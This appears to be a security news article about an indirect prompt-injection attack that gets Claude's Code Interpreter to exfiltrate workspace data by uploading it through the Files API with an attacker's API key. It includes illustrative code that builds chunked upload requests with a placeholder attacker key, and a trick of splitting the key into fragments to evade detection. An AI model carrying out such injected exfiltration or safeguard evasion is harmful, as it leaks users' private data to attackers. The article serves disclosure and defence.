Prompt Injection Variant Lets Hackers Exfiltrate Data from Claude APIs
The discovery, which was publicly documented on October 28, 2025, demonstrates how threat actors can manipulate Claude’s Code Interpreter and API features to exfiltrate confidential information from victims’ workspaces directly into attacker-controlled accounts.
The vulnerability stems from Anthropic’s recent decision to enable network access within Claude’s Code Interpreter environment.
This feature was designed to allow users to fetch resources from trusted package managers, including npm, PyPI, and GitHub, for legitimate development purposes.
However, researchers identified that one of these approved domains, api.anthropic.com, could be weaponized for malicious data theft operations.
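The risk in allowlisting api.anthropic.com alongside package registries is easiest to see in a hypothetical hostname-only egress check. The function and host list below are illustrative, not Anthropic's actual sandbox code:

```python
from urllib.parse import urlparse

# Illustrative allowlist: package registries plus Anthropic's own API host.
APPROVED_HOSTS = {"registry.npmjs.org", "pypi.org", "github.com", "api.anthropic.com"}

def egress_allowed(url: str) -> bool:
    """Permit outbound traffic if the destination host is approved.

    Nothing here inspects WHOSE credentials accompany the request, so a
    call that authenticates to api.anthropic.com with an attacker's API
    key passes the same check as a legitimate package fetch.
    """
    return urlparse(url).hostname in APPROVED_HOSTS

print(egress_allowed("https://pypi.org/simple/requests/"))   # True: package fetch
print(egress_allowed("https://api.anthropic.com/v1/files"))  # True: also the exfiltration path
```

A check like this treats the first-party API host as uniformly trusted, which is exactly the assumption the attack exploits.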
The attack relies on indirect prompt injection, in which attackers hide malicious instructions inside content that Claude processes, such as a document or message pasted into the chat interface.
These hidden commands cause the AI model to execute unauthorized actions without triggering user awareness or suspicion.
The exploitation process begins when Claude receives instructions to write sensitive data, such as previous conversation histories or workspace files, into a local file within its sandbox environment.
Once the sensitive information is written to a file, the malicious payload leverages Anthropic's Files API to upload the data externally.
The critical security flaw occurs when attackers insert their own API keys into the upload request, redirecting the file transfer to their Anthropic account instead of the legitimate user’s workspace.
This technique enables attackers to systematically extract data in chunks of up to 30 megabytes per file upload, according to the official Files API documentation.
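Assuming the payload works roughly as described, the upload step can be sketched as follows. The request is only constructed, never sent; the attacker key is a placeholder, and the real Files API expects a multipart/form-data body rather than the raw bytes shown here:

```python
import urllib.request

ATTACKER_KEY = "sk-ant-ATTACKER-PLACEHOLDER"  # placeholder, not a real key
CHUNK_BYTES = 30 * 1024 * 1024                # ~30 MB per-file upload limit

def build_uploads(stolen: bytes, chunk_bytes: int = CHUNK_BYTES):
    """Split staged data into chunks and build one upload request per chunk.

    The x-api-key header determines which account receives the file, so
    substituting the attacker's key reroutes the upload even though the
    destination host still satisfies a hostname allowlist.
    """
    return [
        urllib.request.Request(
            "https://api.anthropic.com/v1/files",
            data=stolen[i:i + chunk_bytes],  # real API wants multipart; simplified here
            headers={"x-api-key": ATTACKER_KEY, "anthropic-version": "2023-06-01"},
            method="POST",
        )
        for i in range(0, len(stolen), chunk_bytes)
    ]

# Tiny chunk size so the splitting is visible:
reqs = build_uploads(b"conversation history dump", chunk_bytes=10)
print(len(reqs))                     # 3 requests for 25 bytes at 10 bytes/chunk
print(reqs[0].headers["X-api-key"])  # sk-ant-ATTACKER-PLACEHOLDER
```

From the allowlist's perspective, every one of these requests is indistinguishable from the victim's own legitimate API traffic.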
Initial testing revealed that Claude’s safety mechanisms occasionally detected suspicious activity when prompts contained visible API keys.
However, researchers successfully bypassed these protections by disguising malicious code segments within benign-looking payload structures, making the requests appear harmless to automated detection systems.
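The brittleness of pattern-based detection is easy to demonstrate with a toy scanner. This is a hypothetical illustration: the "sk-ant-" key prefix is Anthropic's real format, but the scanner below stands in for no specific safety mechanism:

```python
import re

# Flag prompts containing a literal Anthropic-style API key.
KEY_PATTERN = re.compile(r"sk-ant-[A-Za-z0-9_-]{8,}")

def flags_prompt(prompt: str) -> bool:
    return bool(KEY_PATTERN.search(prompt))

visible   = 'files.upload(key="sk-ant-attacker00000000")'
# The same key assembled at runtime from benign-looking fragments:
disguised = 'files.upload(key="sk-" + "ant-" + "attacker00000000")'

print(flags_prompt(visible))    # True  -> the obvious payload is caught
print(flags_prompt(disguised))  # False -> the split payload slips through
```

Any scanner keyed on surface patterns can be defeated this way, because the model, not the scanner, is what ultimately assembles and executes the instructions.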
The vulnerability was responsibly disclosed to Anthropic through HackerOne on October 25, 2025, but the company initially dismissed the report as “out of scope,” classifying it as a model safety issue rather than a legitimate security vulnerability.
The researcher challenged this categorization, arguing that deliberate data exfiltration through authenticated API calls represents a genuine security threat with serious privacy implications.
Anthropic reversed its position on October 30, 2025, acknowledging the misclassification and confirming that data exfiltration attacks fall within its responsible disclosure program.
The company announced it would review its classification procedures and advised users to carefully monitor Claude’s behavior when executing scripts that access internal or sensitive information.
This incident underscores the expanding intersection between artificial intelligence safety and cybersecurity.
As AI platforms incorporate advanced capabilities like network access and persistent memory, attackers are discovering innovative methods to weaponize prompt injection for data theft purposes.
The case highlights the urgent need for comprehensive monitoring systems, enhanced egress controls, and transparent vulnerability management processes across AI service providers.
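One concrete form such an egress control could take, as a hypothetical sketch rather than a shipped Anthropic feature, is binding first-party API traffic to the workspace owner's own credentials:

```python
# Hypothetical egress policy: package hosts pass on hostname alone, but
# traffic to the first-party API must authenticate with the workspace
# owner's key, blocking redirection to an attacker-controlled account.
PACKAGE_HOSTS = {"registry.npmjs.org", "pypi.org", "github.com"}

def egress_permits(host: str, headers: dict, owner_key: str) -> bool:
    if host == "api.anthropic.com":
        return headers.get("x-api-key") == owner_key
    return host in PACKAGE_HOSTS

owner = "sk-ant-OWNER-PLACEHOLDER"
print(egress_permits("pypi.org", {}, owner))                                         # True
print(egress_permits("api.anthropic.com", {"x-api-key": owner}, owner))              # True
print(egress_permits("api.anthropic.com", {"x-api-key": "sk-ant-ATTACKER"}, owner))  # False
```

Under a policy like this, the key-swap step at the heart of the attack would fail at the network boundary regardless of what the injected prompt convinces the model to do.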
The post Prompt Injection Variant Lets Hackers Exfiltrate Data from Claude APIs appeared first on Cyber Security News.